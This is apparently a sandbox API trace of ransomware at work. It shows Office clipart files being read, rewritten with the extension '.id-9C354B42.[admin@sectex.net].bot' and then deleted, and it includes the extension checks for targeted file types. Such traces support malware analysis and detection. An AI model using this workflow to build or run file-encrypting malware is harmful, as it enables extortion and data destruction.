	[0146.666] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00779_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00779_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c8
	[0146.667] GetLastError () returned 0x0
	[0146.667] ReadFile (in: hFile=0x384, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x2332, lpOverlapped=0x0) returned 1
	[0146.669] WriteFile (in: hFile=0x3c8, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x2340, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x2340, lpOverlapped=0x0) returned 1
	[0146.670] ReadFile (in: hFile=0x384, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0146.670] WriteFile (in: hFile=0x3c8, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0146.670] SetEndOfFile (hFile=0x3c8) returned 1
	[0146.670] CloseHandle (hObject=0x3c8) returned 1
	[0146.670] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0146.670] SetEndOfFile (hFile=0x384) returned 1
	[0146.673] CloseHandle (hObject=0x384) returned 1
	[0146.673] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00779_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0146.673] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00779_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00779_.wmf")) returned 1
	[0146.673] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00779_.WMF") returned 63
	[0146.673] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00779_.WMF") returned 63
	[0146.673] lstrlenW (lpString=".doc") returned 4
	[0146.674] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0146.674] lstrlenW (lpString=".docx") returned 5
	[0146.674] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0146.674] lstrlenW (lpString=".pdf") returned 4
	[0146.674] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0146.674] lstrlenW (lpString=".xls") returned 4
	[0146.674] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0146.674] lstrlenW (lpString=".xlsx") returned 5
	[0146.674] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0146.674] lstrlenW (lpString=".ppt") returned 4
	[0146.674] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0146.674] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00779_.WMF") returned 63
	[0146.674] lstrlenW (lpString=".zip") returned 4
	[0146.674] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0146.674] lstrlenW (lpString=".rar") returned 4
	[0146.674] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0146.674] lstrlenW (lpString=".bz2") returned 4
	[0146.674] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0146.674] lstrlenW (lpString=".7z") returned 3
	[0146.674] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0146.674] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00779_.WMF") returned 63
	[0146.674] lstrlenW (lpString=".dbf") returned 4
	[0146.674] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0146.674] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00779_.WMF") returned 63
	[0146.674] lstrlenW (lpString=".1cd") returned 4
	[0146.674] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0146.674] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00779_.WMF") returned 63
	[0146.674] lstrlenW (lpString=".jpg") returned 4
	[0146.674] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0146.674] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00779_.WMF") returned 63
	[0146.674] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00779_.WMF") returned 63
	[0146.675] lstrlenW (lpString=".doc") returned 4
	[0146.675] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0146.675] lstrlenW (lpString=".docx") returned 5
	[0146.675] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0146.675] lstrlenW (lpString=".pdf") returned 4
	[0146.675] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0146.675] lstrlenW (lpString=".xls") returned 4
	[0146.675] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0146.675] lstrlenW (lpString=".xlsx") returned 5
	[0146.675] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0146.675] lstrlenW (lpString=".ppt") returned 4
	[0146.675] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0146.675] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00779_.WMF") returned 63
	[0146.675] lstrlenW (lpString=".zip") returned 4
	[0146.675] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0146.675] lstrlenW (lpString=".rar") returned 4
	[0146.675] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0146.675] lstrlenW (lpString=".bz2") returned 4
	[0146.675] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0146.675] lstrlenW (lpString=".7z") returned 3
	[0146.675] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0146.675] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00779_.WMF") returned 63
	[0146.675] lstrlenW (lpString=".dbf") returned 4
	[0146.675] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0146.675] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00779_.WMF") returned 63
	[0146.675] lstrlenW (lpString=".1cd") returned 4
	[0146.675] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0146.675] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00779_.WMF") returned 63
	[0146.675] lstrlenW (lpString=".jpg") returned 4
	[0146.675] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0146.676] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0146.676] lstrlenW (lpString="FD00799_.WMF") returned 12
	[0146.676] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00799_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00799_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0146.676] GetFileSizeEx (in: hFile=0x384, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=13968) returned 1
	[0146.676] CloseHandle (hObject=0x384) returned 1
	[0146.676] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00799_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00799_.wmf")) returned 0x20
	[0146.676] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00799_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00799_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0146.676] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00799_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00799_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0146.677] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0146.677] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0146.677] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00799_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00799_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c8
	[0146.677] GetLastError () returned 0x0
	[0146.677] ReadFile (in: hFile=0x384, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x3690, lpOverlapped=0x0) returned 1
	[0146.679] WriteFile (in: hFile=0x3c8, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x36a0, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x36a0, lpOverlapped=0x0) returned 1
	[0146.681] ReadFile (in: hFile=0x384, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0146.681] WriteFile (in: hFile=0x3c8, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0146.681] SetEndOfFile (hFile=0x3c8) returned 1
	[0146.681] CloseHandle (hObject=0x3c8) returned 1
	[0146.681] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0146.681] SetEndOfFile (hFile=0x384) returned 1
	[0146.684] CloseHandle (hObject=0x384) returned 1
	[0146.684] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00799_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0146.684] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00799_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00799_.wmf")) returned 1
	[0146.685] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00799_.WMF") returned 63
	[0146.685] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00799_.WMF") returned 63
	[0146.685] lstrlenW (lpString=".doc") returned 4
	[0146.685] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0146.685] lstrlenW (lpString=".docx") returned 5
	[0146.685] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0146.685] lstrlenW (lpString=".pdf") returned 4
	[0146.685] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0146.685] lstrlenW (lpString=".xls") returned 4
	[0146.685] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0146.685] lstrlenW (lpString=".xlsx") returned 5
	[0146.685] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0146.685] lstrlenW (lpString=".ppt") returned 4
	[0146.685] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0146.685] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00799_.WMF") returned 63
	[0146.685] lstrlenW (lpString=".zip") returned 4
	[0146.685] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0146.685] lstrlenW (lpString=".rar") returned 4
	[0146.685] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0146.685] lstrlenW (lpString=".bz2") returned 4
	[0146.685] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0146.685] lstrlenW (lpString=".7z") returned 3
	[0146.685] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0146.685] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00799_.WMF") returned 63
	[0146.685] lstrlenW (lpString=".dbf") returned 4
	[0146.685] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0146.685] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00799_.WMF") returned 63
	[0146.685] lstrlenW (lpString=".1cd") returned 4
	[0146.685] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0146.685] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00799_.WMF") returned 63
	[0146.685] lstrlenW (lpString=".jpg") returned 4
	[0146.685] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0146.686] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00799_.WMF") returned 63
	[0146.686] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00799_.WMF") returned 63
	[0146.686] lstrlenW (lpString=".doc") returned 4
	[0146.686] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0146.686] lstrlenW (lpString=".docx") returned 5
	[0146.686] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0146.686] lstrlenW (lpString=".pdf") returned 4
	[0146.686] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0146.686] lstrlenW (lpString=".xls") returned 4
	[0146.686] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0146.686] lstrlenW (lpString=".xlsx") returned 5
	[0146.686] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0146.686] lstrlenW (lpString=".ppt") returned 4
	[0146.686] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0146.686] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00799_.WMF") returned 63
	[0146.686] lstrlenW (lpString=".zip") returned 4
	[0146.686] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0146.686] lstrlenW (lpString=".rar") returned 4
	[0146.686] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0146.686] lstrlenW (lpString=".bz2") returned 4
	[0146.686] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0146.686] lstrlenW (lpString=".7z") returned 3
	[0146.686] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0146.686] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00799_.WMF") returned 63
	[0146.686] lstrlenW (lpString=".dbf") returned 4
	[0146.686] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0146.686] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00799_.WMF") returned 63
	[0146.686] lstrlenW (lpString=".1cd") returned 4
	[0146.686] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0146.686] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00799_.WMF") returned 63
	[0146.686] lstrlenW (lpString=".jpg") returned 4
	[0146.686] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0146.687] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0146.687] lstrlenW (lpString="FD00814_.WMF") returned 12
	[0146.687] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00814_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00814_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0146.687] GetFileSizeEx (in: hFile=0x384, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=42704) returned 1
	[0146.687] CloseHandle (hObject=0x384) returned 1
	[0146.687] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00814_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00814_.wmf")) returned 0x20
	[0146.687] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00814_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00814_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0146.688] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00814_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00814_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0146.688] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0146.688] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0146.688] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00814_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00814_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c8
	[0146.688] GetLastError () returned 0x0
	[0146.688] ReadFile (in: hFile=0x384, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0xa6d0, lpOverlapped=0x0) returned 1
	[0146.912] WriteFile (in: hFile=0x3c8, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xa6e0, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xa6e0, lpOverlapped=0x0) returned 1
	[0146.913] ReadFile (in: hFile=0x384, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0146.914] WriteFile (in: hFile=0x3c8, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0146.914] SetEndOfFile (hFile=0x3c8) returned 1
	[0146.914] CloseHandle (hObject=0x3c8) returned 1
	[0146.914] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0146.914] SetEndOfFile (hFile=0x384) returned 1
	[0146.917] CloseHandle (hObject=0x384) returned 1
	[0146.917] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00814_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0147.006] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00814_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00814_.wmf")) returned 1
	[0147.045] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00814_.WMF") returned 63
	[0147.045] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00814_.WMF") returned 63
	[0147.045] lstrlenW (lpString=".doc") returned 4
	[0147.045] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0147.045] lstrlenW (lpString=".docx") returned 5
	[0147.045] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0147.045] lstrlenW (lpString=".pdf") returned 4
	[0147.045] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0147.045] lstrlenW (lpString=".xls") returned 4
	[0147.045] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0147.045] lstrlenW (lpString=".xlsx") returned 5
	[0147.045] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0147.046] lstrlenW (lpString=".ppt") returned 4
	[0147.046] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0147.046] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00814_.WMF") returned 63
	[0147.046] lstrlenW (lpString=".zip") returned 4
	[0147.046] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0147.046] lstrlenW (lpString=".rar") returned 4
	[0147.046] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0147.046] lstrlenW (lpString=".bz2") returned 4
	[0147.046] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0147.046] lstrlenW (lpString=".7z") returned 3
	[0147.046] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0147.046] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00814_.WMF") returned 63
	[0147.046] lstrlenW (lpString=".dbf") returned 4
	[0147.046] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0147.046] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00814_.WMF") returned 63
	[0147.046] lstrlenW (lpString=".1cd") returned 4
	[0147.046] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0147.046] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00814_.WMF") returned 63
	[0147.046] lstrlenW (lpString=".jpg") returned 4
	[0147.046] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0147.046] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00814_.WMF") returned 63
	[0147.046] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00814_.WMF") returned 63
	[0147.046] lstrlenW (lpString=".doc") returned 4
	[0147.046] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0147.046] lstrlenW (lpString=".docx") returned 5
	[0147.046] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0147.046] lstrlenW (lpString=".pdf") returned 4
	[0147.046] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0147.046] lstrlenW (lpString=".xls") returned 4
	[0147.046] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0147.046] lstrlenW (lpString=".xlsx") returned 5
	[0147.047] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0147.047] lstrlenW (lpString=".ppt") returned 4
	[0147.047] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0147.047] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00814_.WMF") returned 63
	[0147.047] lstrlenW (lpString=".zip") returned 4
	[0147.047] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0147.047] lstrlenW (lpString=".rar") returned 4
	[0147.047] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0147.047] lstrlenW (lpString=".bz2") returned 4
	[0147.047] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0147.047] lstrlenW (lpString=".7z") returned 3
	[0147.047] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0147.047] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00814_.WMF") returned 63
	[0147.047] lstrlenW (lpString=".dbf") returned 4
	[0147.047] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0147.047] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00814_.WMF") returned 63
	[0147.047] lstrlenW (lpString=".1cd") returned 4
	[0147.047] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0147.047] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00814_.WMF") returned 63
	[0147.047] lstrlenW (lpString=".jpg") returned 4
	[0147.047] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0147.047] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0147.047] lstrlenW (lpString="FD01176_.WMF") returned 12
	[0147.047] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01176_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01176_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0
	[0147.048] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=4984) returned 1
	[0147.048] CloseHandle (hObject=0x2a0) returned 1
	[0147.048] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01176_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01176_.wmf")) returned 0x20
	[0147.048] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01176_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01176_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0147.048] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01176_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01176_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0
	[0147.048] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.048] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
